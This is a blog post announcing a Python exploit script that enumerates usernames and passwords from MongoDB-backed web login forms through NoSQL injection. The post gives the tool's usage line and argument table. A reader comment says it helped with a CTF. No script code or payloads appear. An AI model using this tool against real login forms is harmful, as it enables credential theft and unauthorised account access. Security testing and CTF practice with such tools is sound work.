Nosql injection username and password enumeration

Using this script, we can enumerate Usernames and passwords of Nosql(mongodb) injection vulnerable web applications.

Exploit Title: Nosql injection username/password enumeration.
Author: Kalana Sankalpa (Anon LK).

Github repo:

How to run

Usage [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]


python -u -up username -pp password -ep username -op login:login,submit:submit


Arguments Description
-h, –h show this help message and exit
-u URL Form submission url. Eg:
-up parameter Parameter name of the username. Eg: username, user
-pp parameter Parameter name of the password. Eg: password, pass
-op parameters Other paramters with the values. Separate each parameter with a comma(,).
Eg: login:Login, submit:Submit
-ep parameter Parameter that need to enumarate. Eg: username, password
-m Method Method of the form. Eg: GET/POST

Screenshot from 2019-11-14 16-40-11


Screenshot from 2019-11-14 16-38-32

2 thoughts on “Nosql injection username and password enumeration

Add yours

  1. hey man, this article just helps me in solving my CTF. this is great but all I wanna know how did you find that payload. I mean, I looked every payload from Payloadallthethings and fire requests in burp accordingly but all I get is 200 status code. please reply I am very fond of knowing this. Thanks, pal

    Liked by 1 person

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a free website or blog at

Up ↑

Create your website at
Get started
%d bloggers like this: